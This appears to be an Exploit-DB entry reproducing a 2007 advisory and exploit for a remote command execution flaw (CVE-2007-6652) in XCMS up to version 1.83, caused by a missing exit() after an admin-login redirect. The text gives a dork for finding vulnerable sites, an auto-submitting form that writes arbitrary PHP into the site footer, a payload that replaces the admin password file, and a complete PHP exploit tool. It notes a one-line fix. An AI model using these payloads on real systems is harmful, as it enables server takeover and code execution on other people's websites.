XCMS <= 1.83 - Remote Command Execution Exploit

2007-12-30T00:00:00
ID EDB-ID:4813
Type exploitdb
Reporter x0kster
Modified 2007-12-30T00:00:00

Description

XCMS <= 1.83 Remote Command Execution Exploit. CVE-2007-6652. Webapps exploit for php platform

                                        
                                            Name            :  XCMS &lt;= v1.83 Remote Command Execution Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.xcms.it
Date            :  28/12/2007
Dork            :  inurl:"mod=notizie"

The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
 
       &lt;?php
         //home.php
         [...]
         include(CSTR."footer".STR); // &lt;- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
       ?&gt;

So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.

       &lt;?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // &lt;- so miss an exit() :-D
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // &lt;- save the changements without any kind of control
         } 
         [...]
       ?&gt;
       
So with a simple html form we can change the footer.
Ex:

        &lt;form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&amp;pg=admin&amp;s=cpie" method="post"&gt;
        &lt;input type="hidden" name="salva" value="OK" /&gt;
        &lt;textarea name="testo_0"&gt;&lt;?php YOUR PHP CODE ?&gt;&lt;/textarea&gt;
        &lt;input type="submit" value="Modifica" /&gt;
        &lt;/form&gt;
        &lt;script&gt;document.editor.submit()&lt;/script&gt;
        
        Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
 
 
       
Trick: We can change the admin panel password by inserting this code in the footer:
      
       &lt;?php
       $pwd = "owned"; // &lt;- Place here your new password.
       $pwd2 = md5($pwd);
       unlink("dati/generali/pass.php");
	   $f = fopen("dati/generali/pass.php",w);
       fwrite($f,"&lt;?php \$mdp = \"$pwd2\"; ?&gt;");
       fclose($f);
       ?&gt;
       
This code delete the old password file and then create a new one with your new password.


Fix:
  
        &lt;?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // &lt;- save the changements without any kind of control
         } 
         [...]
       ?&gt;

So this is a simple exploit:


&lt;?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
&lt;form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&amp;pg=admin&amp;s=cpie\" method=\"post\"&gt;
&lt;input type=\"hidden\" name=\"salva\" value=\"OK\" /&gt;
&lt;textarea name=\"testo_0\"&gt;".$_POST['code']."&lt;/textarea&gt;
&lt;input type=\"submit\" value=\"Modifica\" /&gt;
&lt;/form&gt;
&lt;script&gt;document.editor.submit()&lt;/script&gt;";
}else{
echo"
&lt;pre&gt;
XCMS &lt;= v1.82 Remote Command Execution Vulnerability
Dork  :  inurl:\"mod=notizie\"
by x0kster
Visit ihteam.net
&lt;/pre&gt;
&lt;form method=POST action=".$_POST['PHP_SELF']."&gt;
&lt;pre&gt;
Site     :
&lt;input type=text name=site /&gt;
Code     :
&lt;textarea name=code cols=49 rows=14&gt;Your code here&lt;/textarea&gt;
&lt;input type=submit value=Exploit /&gt;
&lt;input type=hidden name=\"send\" /&gt;
&lt;/pre&gt;
&lt;/form&gt;";	  
}		
?&gt;

# milw0rm.com [2007-12-30]